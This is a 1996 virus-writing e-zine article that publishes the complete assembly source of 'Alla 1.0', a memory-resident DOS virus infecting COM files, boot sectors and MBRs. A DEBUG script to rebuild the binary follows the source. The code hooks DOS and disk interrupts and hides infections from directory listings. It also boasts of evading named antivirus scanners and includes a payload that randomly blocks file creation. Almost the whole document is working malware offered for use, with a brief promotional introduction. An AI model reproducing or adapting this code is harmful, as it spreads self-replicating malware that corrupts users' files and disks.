Insane Reality issue #8 - (c)opyright 1996 Immortal Riot/Genesis - REALITY.027 Article: Alla 1.0 Author: Wild W0rker [RSA] % Alla 1.0 Virus by Wild W0rker [RSA] % _______________________________________ Alla is a cool multi-partite virus from Wild W0rker [RSA] (ex-DC). Its features include stealth, interesting hooking of INT 21h at boot-up, and several other things - read on. Debug Script follows. - _Sepultura_ ;=[BEGIN ALLA.ASM]=========================================================== comment $ ALLA v1.0 by Wild W0rker /RSA - Resident COM/BS/MBR infector - Semi Stealth on COM files, full stealth on BS/MBR - Format additional track on diskettes - No TBSCAN flags, no AVP alert, no DrWeb alert - Sometime don't allow to create files:) P.S. The virus name is ALLA, not ALLAH:) I have dedicated it to one girl:) $ jumps .model tiny .code viruskb equ (offset last - offset start) / 1024 + 1 viruslen equ offset end_of_file - offset start paralen equ (offset last - offset start) / 16 + 1 sectors equ 3 start: call $+3 ; file start mov bp,sp mov bp,word ptr ss:[bp] sub bp,3 call skip_e_flag mov byte ptr cs:[i21set+bp],0 mov ax,0bebeh int 13h or ax,ax je in_memory xor di,di mov ax,ds dec ax mov ds,ax cmp byte ptr ds:[di],'Z' jne in_memory mov byte ptr ds:[di],'M' sub word ptr ds:[di+3],paralen + 1 sub word ptr ds:[di+12h],paralen + 1 mov ax,word ptr ds:[di+12h] mov es,ax mov byte ptr es:[di],'Z' mov word ptr es:[di+1],8 mov word ptr es:[di+3],paralen inc ax mov es,ax push cs pop ds lea si,start add si,bp mov cx,viruslen cld rep movsb push cs lea ax,in_memory add ax,bp push ax es lea ax,inhigh push ax retf skip_e_flag: ret 2 in_memory: lea si,orgbytes add si,bp mov di,200h shr di,1 push cs cs pop ds es push di mov cx,3 cld rep movsb xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor di,di xor si,si xor bp,bp ret inhigh: push cs pop ds call hooki21 mov di,13h push di call getint mov word ptr ds:[i13],di mov word ptr ds:[i13+2],es pop di lea si,int13 call setint retf ;di - int num getint: cli push ax shl di,1 shl di,1 xor ax,ax mov es,ax les di,dword ptr es:[di] pop ax sti ret ; di - int num ; ds:si - handler setint: cli push ax es xor ax,ax mov es,ax shl di,1 shl di,1 mov word ptr es:[di],si mov word ptr es:[di+2],ds pop es ax sti ret check_names: push ax cx di si es mov di,dx push ds pop es mov cx,80h mov al,0 cld repne scasb jne cn_err1 sub di,4 mov si,di lodsw or ax,2020h not ax cmp ax,not 'oc' jne cn_err1 lodsb or al,20h cmp al,'m' jne cn_err1 pop es si di cx ax clc ret cn_err1: pop es si di cx ax stc ret pushall: pop word ptr cs:[ret_word] push ax bx cx dx si di ds es jmp word ptr cs:[ret_word] popall: pop word ptr cs:[ret_word] pop es ds di si dx cx bx ax jmp word ptr cs:[ret_word] retf_i21: retf 2 stealth_4e4f: not ax call oi21 jc retf_i21 pushf call pushall mov ah,2fh call oi21 push es pop ds mov ax,word ptr ds:[bx+16h] and ax,1fh cmp ax,1fh jne stealth_exit sub word ptr ds:[bx+1ah],viruslen sbb word ptr ds:[bx+1ah+2],0 and word ptr ds:[bx+16h],0ffe0h stealth_exit: call popall popf jmp short retf_i21 stealth_1112: not ax call oi21 or al,al jne retf_i21 pushf call pushall mov ah,2fh call oi21 push es pop ds cmp byte ptr ds:[bx],255 jne not_extended add bx,7 not_extended: mov al,byte ptr ds:[bx+17h] and al,1fh cmp al,1fh jne stealth_exit sub word ptr ds:[bx+1dh],viruslen sbb word ptr ds:[bx+1fh],0 and word ptr ds:[bx+17h],0ffe0h jmp stealth_exit payload: not ax push ax ds xor ax,ax mov ds,ax mov ax,word ptr ds:[46ch] and ax,13 cmp ax,13 je do_it pop ds ax jmp short i21end do_it: pop ds ax stc retf 2 int21: not ax cmp ax,not 4b00h je infect_4b cmp ah,not 43h je checkname cmp ah,not 3dh je checkname cmp ah,not 3ch je payload cmp ah,not 4fh je stealth_4e4f cmp ah,not 4eh je stealth_4e4f cmp ah,not 11h je stealth_1112 cmp ah,not 12h je stealth_1112 not ax i21end: jmp dword ptr cs:[i21] infect_4b: not ax jmp short infect checkname: not ax call check_names ; error in name? jc i21end infect: push ax bx cx dx si di es ds cs pop ds mov di,24h push di call getint mov word ptr ds:[i24],di mov word ptr ds:[i24+2],es pop di lea si,int24 call setint pop ds push ds mov word ptr cs:[fname],dx mov word ptr cs:[fname+2],ds mov ax,4300h call oi21 jc restore_i24 mov word ptr cs:[attr],cx xor cx,cx mov ax,4300h inc al call oi21 jc restore_i24 mov ax,3d02h call oi21 jc restore_attr xchg ax,bx push cs pop ds mov ax,5700h call oi21 mov word ptr ds:[time],cx mov word ptr ds:[date],dx and cx,1fh cmp cx,1fh ; infected ? je close_file ; if so, close file and exit mov ah,3fh lea dx,orgbytes mov cx,3 call oi21 jc close_file mov ax,word ptr ds:[orgbytes] not ax cmp ax,not 'ZM' je close_file mov ax,4202h xor cx,cx cwd call oi21 cmp ax,1024 jb close_file cmp ax,64000 ja close_file sub ax,3 mov word ptr ds:[jump+1],ax mov ah,40h xor dx,dx mov cx,viruslen call oi21 jc close_file mov ax,4200h xor cx,cx cwd call oi21 mov ah,42h sub ah,2 mov cx,3 lea dx,jump call oi21 mov cx,word ptr ds:[time] or cx,1fh jmp short set_new_time restore_time: mov cx,word ptr ds:[time] set_new_time: mov dx,word ptr ds:[date] mov ax,5700h inc al call oi21 close_file: mov ah,3eh call oi21 restore_attr: mov ax,4300h inc al lds dx,dword ptr cs:[fname] mov cx,word ptr cs:[attr] call oi21 restore_i24: lds si,dword ptr cs:[i24] mov di,24h call setint pop ds es di si dx cx bx ax jmp i21end oi21: pushf db 09ah i21 dw 0,0 ret oi13: pushf db 09ah i13 dw 0,0 ret int24: mov al,3 iret int13: cmp ax,0bebeh jne check_bs_mbr xor ax,ax iret check_bs_mbr: cmp ah,2 jne multi cmp dh,0 jne multi cmp cx,1 jne multi call oi13 jc i13err pushf push ax bx cx dx es ds si di lea si,sign mov di,si sub di,offset myboot add di,bx push cs pop ds mov cx,signlen cld repe cmpsb je stealth_disk cmp dl,2 ja hard_inf call checkdisk jne i13exit push es bx push cs pop es mov ax,0504h mov ch,50h lea bx,track_tab call oi13 jc i13exit1 pop bx es hard_inf: mov ax,0301h ; save original bs/mbr mov cl,4 call oi13 jc i13exit push es bx push cs ; save virus body pop es xor bx,bx mov ah,3 mov al,sectors mov cl,5 call oi13 push cs pop ds mov cx,mybootlen lea si,myboot lea di,sector_buffer mov bx,di cld rep movsb pop si ds cmp dl,2 ja dombr mov di,offset sector_buffer + 11 mov cx,inflen add si,11 rep movsb jmp short writeit dombr: add si,1beh ; save partition mov di,offset sector_buffer + 1beh mov cx,200h-1beh rep movsb writeit: mov word ptr es:[bx+1feh],0AA55h mov ax,0301h mov cx,1 call oi13 jmp i13exit stealth_disk: mov cl,4 cmp dl,2 ja stealth_mbr mov ch,50h jmp short do_stealth stealth_mbr: xor ch,ch do_stealth: mov ax,0201h call oi13 i13exit: pop di si ds es dx cx bx ax popf i13err: retf 2 i13end: jmp dword ptr cs:[i13] i13exit1: pop bx es jmp short i13exit multi: cmp byte ptr cs:[i21set],1 je i13end pushf push ax bx ds xor ax,ax mov ds,ax mov ax,word ptr ds:[24h*4+2] mov bx,word ptr ds:[23h*4+2] cmp bx,ax jne we_out call hooki21 we_out: pop ds bx ax popf jmp short i13end hooki21: push di si ds es cs pop ds mov di,21h push di call getint mov word ptr ds:[i21],di mov word ptr ds:[i21+2],es pop di lea si,int21 call setint mov byte ptr ds:[i21set],1 ; i21 intercepted pop es ds si di ret myboot: jmp short realstart db 90h db 'Alla 1.0' bootinf db 54 dup (90h) inflen equ $-bootinf realstart: xor ax,ax mov ds,ax mov si,7c00h cli mov sp,si mov ss,ax sti mov di,413h sub word ptr ds:[di],viruskb int 12h mov bl,6 xchg bl,cl ; no tbav A flag:) shl ax,cl mov es,ax mov word ptr ds:[23h*4+2],100h mov word ptr ds:[24h*4+2],101h xor ax,ax int 13h xor dh,dh mov cx,5 or dl,dl js hard_boot mov ch,50h hard_boot: xor bx,bx mov ah,2 mov al,sectors int 13h mov byte ptr es:[i21set],0 lea di,i13 mov si,13h*4 cld movsw movsw mov word ptr ds:[si-4],offset int13 mov word ptr ds:[si-2],es push es lea si,return push si retf return: push ds pop es push es mov bx,7c00h push bx mov cl,4 mov ax,0201h call oi13 retf sign db 'Wild W0rker /RSA' signlen equ $-sign mybootlen equ $-myboot checkdisk: push dx cx bx di es mov ah,8 call oi13 cmp ch,4fh pop es di bx cx dx ret track_tab db 50h,0,4,2 db 50h,0,5,2 db 50h,0,6,2 db 50h,0,7,2 jump db 0e9h,0,0 orgbytes db 0cdh,20h,90h end_of_file: i21set db 0 i24 dw 0,0 attr dw 0 time dw 0 date dw 0 fname dw 0,0 sector_buffer db 512 dup (0) ret_word dw 0 last: end start ;=[END ALLA.ASM]============================================================= ;=[BEGIN ALLA.SCR]=========================================================== N ALLA.COM E 0100 E8 00 00 8B EC 8B 6E 00 83 ED 03 E8 58 00 2E C6 E 0110 86 2D 05 00 B8 BE BE CD 13 0B C0 74 4C 33 FF 8C E 0120 D8 48 8E D8 80 3D 5A 75 40 C6 05 4D 83 6D 03 75 E 0130 83 6D 12 75 8B 45 12 8E C0 26 C6 05 5A 26 C7 45 E 0140 01 08 00 26 C7 45 03 74 00 40 8E C0 0E 1F BE 00 E 0150 00 03 F5 B9 2D 05 FC F3 A4 0E B8 69 00 03 C5 50 E 0160 06 B8 8D 00 50 CB C2 02 00 BE 2A 05 03 F5 BF 00 E 0170 02 D1 EF 0E 0E 1F 07 57 B9 03 00 FC F3 A4 33 C0 E 0180 33 DB 33 C9 33 D2 33 FF 33 F6 33 ED C3 0E 1F E8 E 0190 8E 03 BF 13 00 57 E8 10 00 89 3E 05 03 8C 06 07 E 01A0 03 5F BE 0D 03 E8 11 00 CB FA 50 D1 E7 D1 E7 33 E 01B0 C0 8E C0 26 C4 3D 58 FB C3 FA 50 06 33 C0 8E C0 E 01C0 D1 E7 D1 E7 26 89 35 26 8C 5D 02 07 58 FB C3 50 E 01D0 51 57 56 06 8B FA 1E 07 B9 80 00 B0 00 FC F2 AE E 01E0 75 1E 83 EF 04 8B F7 AD 0D 20 20 F7 D0 3D 9C 90 E 01F0 75 0E AC 0C 20 3C 6D 75 07 07 5E 5F 59 58 F8 C3 E 0200 07 5E 5F 59 58 F9 C3 2E 8F 06 3C 07 50 53 51 52 E 0210 56 57 1E 06 2E FF 26 3C 07 2E 8F 06 3C 07 07 1F E 0220 5F 5E 5A 59 5B 58 2E FF 26 3C 07 CA 02 00 F7 D0 E 0230 E8 C9 01 72 F6 9C E8 CE FF B4 2F E8 BE 01 06 1F E 0240 8B 47 16 25 1F 00 3D 1F 00 75 0D 81 6F 1A 2D 05 E 0250 83 5F 1C 00 83 67 16 E0 E8 BE FF 9D EB CD F7 D0 E 0260 E8 99 01 0A C0 75 C4 9C E8 9C FF B4 2F E8 8C 01 E 0270 06 1F 80 3F FF 75 03 83 C3 07 8A 47 17 24 1F 3C E 0280 1F 75 D5 81 6F 1D 2D 05 83 5F 1F 00 83 67 17 E0 E 0290 EB C6 F7 D0 50 1E 33 C0 8E D8 A1 6C 04 25 0D 00 E 02A0 3D 0D 00 74 04 1F 58 EB 3B 1F 58 F9 CA 02 00 F7 E 02B0 D0 3D FF B4 74 33 80 FC BC 74 32 80 FC C2 74 2D E 02C0 80 FC C3 74 CD 80 FC B0 75 03 E9 61 FF 80 FC B1 E 02D0 75 03 E9 59 FF 80 FC EE 74 84 80 FC ED 75 03 E9 E 02E0 7C FF F7 D0 2E FF 2E FE 02 F7 D0 EB 07 F7 D0 E8 E 02F0 DD FE 72 F0 50 53 51 52 56 57 06 1E 0E 1F BF 24 E 0300 00 57 E8 A4 FE 89 3E 2E 05 8C 06 30 05 5F BE 0A E 0310 03 E8 A5 FE 1F 1E 2E 89 16 38 05 2E 8C 1E 3A 05 E 0320 B8 00 43 E8 D6 00 73 03 E9 BB 00 2E 89 0E 32 05 E 0330 33 C9 B8 00 43 FE C0 E8 C2 00 73 03 E9 A7 00 B8 E 0340 02 3D E8 B7 00 73 03 E9 8A 00 93 0E 1F B8 00 57 E 0350 E8 A9 00 89 0E 34 05 89 16 36 05 83 E1 1F 83 F9 E 0360 1F 74 6C B4 3F BA 2A 05 B9 03 00 E8 8E 00 72 5F E 0370 A1 2A 05 F7 D0 3D B2 A5 74 55 B8 02 42 33 C9 99 E 0380 E8 79 00 3D 00 04 72 47 3D 00 FA 77 42 2D 03 00 E 0390 A3 28 05 B4 40 33 D2 B9 2D 05 E8 5F 00 72 30 B8 E 03A0 00 42 33 C9 99 E8 54 00 B4 42 80 EC 02 B9 03 00 E 03B0 BA 27 05 E8 46 00 8B 0E 34 05 83 C9 1F EB 04 8B E 03C0 0E 34 05 8B 16 36 05 B8 00 57 FE C0 E8 2D 00 B4 E 03D0 3E E8 28 00 B8 00 43 FE C0 2E C5 16 38 05 2E 8B E 03E0 0E 32 05 E8 16 00 2E C5 36 2E 05 BF 24 00 E8 C8 E 03F0 FD 1F 07 5F 5E 5A 59 5B 58 E9 E8 FE 9C 9A 00 00 E 0400 00 00 C3 9C 9A 00 00 00 00 C3 B0 03 CF 3D BE BE E 0410 75 03 33 C0 CF 80 FC 02 74 03 E9 DF 00 80 FE 00 E 0420 74 03 E9 D7 00 83 F9 01 74 03 E9 CF 00 E8 D3 FF E 0430 73 03 E9 BB 00 9C 50 53 51 52 06 1E 56 57 BE F4 E 0440 04 8B FE 81 EF 46 04 03 FB 0E 1F B9 10 00 FC F3 E 0450 A6 75 03 E9 7E 00 80 FA 02 77 1E E8 A6 01 74 03 E 0460 E9 84 00 06 53 0E 07 B8 04 05 B5 50 BB 17 05 E8 E 0470 91 FF 73 03 E9 81 00 5B 07 B8 01 03 B1 04 E8 82 E 0480 FF 72 64 06 53 0E 07 33 DB B4 03 B0 03 B1 05 E8 E 0490 71 FF 0E 1F B9 BE 00 BE 46 04 BF 3C 05 8B DF FC E 04A0 F3 A4 5E 1F 80 FA 02 77 0D BF 47 05 B9 36 00 83 E 04B0 C6 0B F3 A4 EB 0C 81 C6 BE 01 BF FA 06 B9 42 00 E 04C0 F3 A4 26 C7 87 FE 01 55 AA B8 01 03 B9 01 00 E8 E 04D0 31 FF EB 13 B1 04 80 FA 02 77 04 B5 50 EB 02 32 E 04E0 ED B8 01 02 E8 1C FF 5F 5E 1F 07 5A 59 5B 58 9D E 04F0 CA 02 00 2E FF 2E 05 03 5B 07 EB EB 2E 80 3E 2D E 0500 05 01 74 EF 9C 50 53 1E 33 C0 8E D8 A1 92 00 8B E 0510 1E 8E 00 3B D8 75 03 E8 06 00 1F 5B 58 9D EB D3 E 0520 57 56 1E 06 0E 1F BF 21 00 57 E8 7C FC 89 3E FE E 0530 02 8C 06 00 03 5F BE AF 01 E8 7D FC C6 06 2D 05 E 0540 01 07 1F 5E 5F C3 EB 3F 90 41 6C 6C 61 20 31 2E E 0550 30 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E 0560 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E 0570 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 E 0580 90 90 90 90 90 90 90 33 C0 8E D8 BE 00 7C FA 8B E 0590 E6 8E D0 FB BF 13 04 83 2D 02 CD 12 B3 06 86 D9 E 05A0 D3 E0 8E C0 C7 06 8E 00 00 01 C7 06 92 00 01 01 E 05B0 33 C0 CD 13 32 F6 B9 05 00 0A D2 78 02 B5 50 33 E 05C0 DB B4 02 B0 03 CD 13 26 C6 06 2D 05 00 BF 05 03 E 05D0 BE 4C 00 FC A5 A5 C7 44 FC 0D 03 8C 44 FE 06 BE E 05E0 E4 04 56 CB 1E 07 06 BB 00 7C 53 B1 04 B8 01 02 E 05F0 E8 10 FE CB 57 69 6C 64 20 57 30 72 6B 65 72 20 E 0600 2F 52 53 41 52 51 53 57 06 B4 08 E8 F5 FD 80 FD E 0610 4F 07 5F 5B 59 5A C3 50 00 04 02 50 00 05 02 50 E 0620 00 06 02 50 00 07 02 E9 00 00 CD 20 90 00 00 00 E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 RCX 073E W Q ;=[END ALLA.SCR]=============================================================